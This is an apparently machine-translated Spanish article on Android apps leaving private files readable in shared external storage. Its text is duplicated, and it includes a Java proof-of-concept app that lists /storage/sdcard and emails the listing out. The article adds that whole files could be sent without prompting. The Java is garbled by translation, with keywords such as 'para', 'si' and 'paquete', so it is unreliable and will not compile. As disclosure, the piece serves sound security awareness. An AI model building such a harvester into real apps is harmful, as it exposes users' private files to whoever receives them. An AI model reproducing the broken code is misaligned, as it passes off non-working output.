La aplicación de Android de los desarrolladores no se preocupan por los usuarios la seguridad de los datos, lo que provoca fugas de datos
por Habrahabr Usuario
Es un secreto a voces que las aplicaciones de Android son muy vulnerables a las fugas de datos, principalmente debido a que sus desarrolladores. Sin embargo, otro hecho que confirma que fue descrito recientemente en habrahabr.ru - un ruso de recursos, popular entre los expertos, en particular con los desarrolladores de aplicaciones.
En su propio smartphone, el autor del post di cuenta de directorios y archivos de aplicaciones, que por mucho tiempo había sido eliminado, en /storage/sdcard, y se preguntó si una aplicación para Android fue capaz de leer los archivos temporales desde otra aplicación.
Qué archivos temporales y por qué debemos cuidar de ellos? Estos archivos pueden contener sus fotos, registros de llamadas telefónicas, base de datos de sus diarios y un montón de otra información que personalmente considere privada y no quiero ponerla a disposición de todo el mundo.
En Android, los archivos temporales de todas las aplicaciones se almacenan en /storage/sdcard. Cuando una aplicación se eliminan, estas temperaturas siguen siendo - si el desarrollador no se cuidaba para la eliminación de ellos en este caso.
Un administrador de archivos descargados de google.jugar le permitirá leer los archivos temporales de todas las aplicaciones instaladas en el dispositivo Android, incluyendo sin cifrar las grabaciones de las conversaciones telefónicas de los mensajeros y de la telefonía sip aplicaciones, historial de navegación de los navegadores, las listas de reproducción de los jugadores, varios info de las redes sociales, notas personales acerca de cosas que hacer de los diarios, etcétera.
Sólo fantasía: temp archivos de whatsapp, el popular mensajero con más de 33 000 000 de usuarios, también se almacenan en /storage/sdcard; lo que es más, sólo los mensajes son cifrados, las fotos no se. Whatsapp es sólo un ejemplo de muchos, de casi todos los populares aplicaciones de almacenar sus datos personales en /storage/sdcard/%appName% y cualquier otra aplicación tiene acceso a este directorio.
Por ejemplo, este mensajero almacena las fotos enviadas a usted en el directorio accesible para todas las aplicaciones en el dispositivo, que tiene permiso para acceder al almacenamiento de:
Y este popular cliente sip tiendas settins de su cuenta sip. En el peor de los casos, estos datos pueden ser robados para obtener acceso no autorizado:
Bien, ¿quiere decir que alguien puede robar fotos de tu dispositivo Android? El autor escribió un bastante pequeño programa en Java que envía estructura de /storage/sdcard a una dirección de correo electrónico especificada.
El código fuente de la aplicación que los correos electrónicos de la estructura de directorio de /storage/sdcard:
-----------------
-----------------
Introduzca la dirección de correo electrónico, y la aplicación de los correos electrónicos de la estructura de directorio de /storage/sdcard; como ustedes saben, esto se puede hacer sin una solicitud de correo electrónico y no sólo la estructura de directorios, pero también de los propios archivos pueden ser enviados. Aplicaciones en google.jugar es raro ser revisado cuidadosamente. Por desgracia, esta es una herramienta muy eficaz para los vendedores, ya que ellos siempre quieren saber lo más posible acerca de sus usuarios. No hace falta decir que los datos personales pueden ser obtenidos de esta manera.
Y aquí está la carta que vas a recibir; contiene contenido de /storage/sdcard, es decir, habrá todos los archivos y carpetas de las aplicaciones instaladas en tu dispositivo:
Ver el directorio /storage/sdcard utilizar cualquier gestor de archivos para android; como una opción, el mismo que está disponible cuando se conecta el dispositivo a un PC /teléfono; si el uso de mensajeros, las redes sociales, un programador de tareas, ver lo que teóricamente puede cualquier desarrollador de android a ver, que escribió android.el permiso.READ_EXTERNAL_STORAGE en el manifiesto.
Así, la conclusión es clara: muchos de los que desarrollan aplicaciones como redes sociales, mensajería instantánea, telefonía sip clientes, diarios, no se preocupan por la seguridad de los datos de los usuarios.
Fecha de publicación:
En su propio smartphone, el autor del post di cuenta de directorios y archivos de aplicaciones, que por mucho tiempo había sido eliminado, en /storage/sdcard, y se preguntó si una aplicación para Android fue capaz de leer los archivos temporales desde otra aplicación.
Qué archivos temporales y por qué debemos cuidar de ellos? Estos archivos pueden contener sus fotos, registros de llamadas telefónicas, base de datos de sus diarios y un montón de otra información que personalmente considere privada y no quiero ponerla a disposición de todo el mundo.
En Android, los archivos temporales de todas las aplicaciones se almacenan en /storage/sdcard. Cuando una aplicación se eliminan, estas temperaturas siguen siendo - si el desarrollador no se cuidaba para la eliminación de ellos en este caso.
Un administrador de archivos descargados de google.jugar le permitirá leer los archivos temporales de todas las aplicaciones instaladas en el dispositivo Android, incluyendo sin cifrar las grabaciones de las conversaciones telefónicas de los mensajeros y de la telefonía sip aplicaciones, historial de navegación de los navegadores, las listas de reproducción de los jugadores, varios info de las redes sociales, notas personales acerca de cosas que hacer de los diarios, etcétera.
Sólo fantasía: temp archivos de whatsapp, el popular mensajero con más de 33 000 000 de usuarios, también se almacenan en /storage/sdcard; lo que es más, sólo los mensajes son cifrados, las fotos no se. Whatsapp es sólo un ejemplo de muchos, de casi todos los populares aplicaciones de almacenar sus datos personales en /storage/sdcard/%appName% y cualquier otra aplicación tiene acceso a este directorio.
Por ejemplo, este mensajero almacena las fotos enviadas a usted en el directorio accesible para todas las aplicaciones en el dispositivo, que tiene permiso para acceder al almacenamiento de:
Y este popular cliente sip tiendas settins de su cuenta sip. En el peor de los casos, estos datos pueden ser robados para obtener acceso no autorizado:
Bien, ¿quiere decir que alguien puede robar fotos de tu dispositivo Android? El autor escribió un bastante pequeño programa en Java que envía estructura de /storage/sdcard a una dirección de correo electrónico especificada.
El código fuente de la aplicación que los correos electrónicos de la estructura de directorio de /storage/sdcard:
-----------------
paquete android.com.testapp;
import android.contenido.La intención;
import android.os.Medio ambiente;
import android.apoyo.v7.app.AppCompatActivity;
import android.os.Paquete;
import android.vista.Vista;
import android.widget.Botón;
import android.widget.EditText;
import android.widget.Brindis;
import java.io.Archivo;
import java.util.Fecha;
public class MainActivity extends AppCompatActivity {
Botón emailButton;
EditText de correo electrónico;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R. layout.activity_main);
correo electrónico = (EditText) findViewById(R. id.el correo electrónico);
emailButton = (Button) findViewById(R. id.emailButton);
emailButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
getFileStrucure();
}
});
}
protected void getFileStrucure(){
Filewalker fw = new Filewalker();
fw.a pie(Archivo nuevo(medio Ambiente.getExternalStorageDirectory().getAbsolutePath()));
}
clase privada Filewalker {
private int count = 0;
Cadena privada de sked = "";
public void pie de Archivos(root) {
count++;
Archivo[] lista = raíz.listFiles();
para (Archivo f : lista) {
si (f.isDirectory()) {
sked += "hora:" + new Date(f.lastModified()) + ", dir: "+ f.getAbsoluteFile() + "\n";
a pie(f);
}
else {
sked += "hora:" + new Date(f.lastModified()) + ", tamaño: "+ f.length() + ", " + f.getAbsoluteFile() + "\n";
}
}
count--;
if (count == 0) {
sendMail(sked);
}
}
}
protected void sendMail(Cadena de sked) {
Intent i = new Intent(Intent.ACTION_SEND);
yo.setType("message/rfc822");
yo.putExtra(Intent.EXTRA_EMAIL, new String[]{correo electrónico.getText().toString()});
yo.putExtra(Intent.EXTRA_SUBJECT, "android estructura de almacenamiento");
yo.putExtra(Intent.EXTRA_TEXT, sked);
try {
startActivity(Intent.createChooser(i, "Enviar correo electrónico..."));
} catch (android.contenido.ActivityNotFoundException ex) {
Pan tostado.makeText(getApplicationContext(), "no Hay clientes de correo electrónico instalado.", Pan tostado.LENGTH_SHORT).show();
}
}
}
-----------------
Introduzca la dirección de correo electrónico, y la aplicación de los correos electrónicos de la estructura de directorio de /storage/sdcard; como ustedes saben, esto se puede hacer sin una solicitud de correo electrónico y no sólo la estructura de directorios, pero también de los propios archivos pueden ser enviados. Aplicaciones en google.jugar es raro ser revisado cuidadosamente. Por desgracia, esta es una herramienta muy eficaz para los vendedores, ya que ellos siempre quieren saber lo más posible acerca de sus usuarios. No hace falta decir que los datos personales pueden ser obtenidos de esta manera.
Y aquí está la carta que vas a recibir; contiene contenido de /storage/sdcard, es decir, habrá todos los archivos y carpetas de las aplicaciones instaladas en tu dispositivo:
Ver el directorio /storage/sdcard utilizar cualquier gestor de archivos para android; como una opción, el mismo que está disponible cuando se conecta el dispositivo a un PC /teléfono; si el uso de mensajeros, las redes sociales, un programador de tareas, ver lo que teóricamente puede cualquier desarrollador de android a ver, que escribió android.el permiso.READ_EXTERNAL_STORAGE en el manifiesto.
Así, la conclusión es clara: muchos de los que desarrollan aplicaciones como redes sociales, mensajería instantánea, telefonía sip clientes, diarios, no se preocupan por la seguridad de los datos de los usuarios.
Fecha de publicación:
